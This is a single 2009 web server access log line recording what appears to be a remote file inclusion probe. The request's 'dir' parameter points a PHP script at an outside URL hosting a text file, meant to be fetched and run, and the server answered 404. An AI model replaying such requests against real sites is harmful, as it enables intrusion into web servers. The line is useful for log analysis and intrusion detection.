210.68.188.206 - - [28/Apr/2009:11:33:28 -0700] "GET /logs/access_081119.log//skin/zero_vote/ask_password.php?dir=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
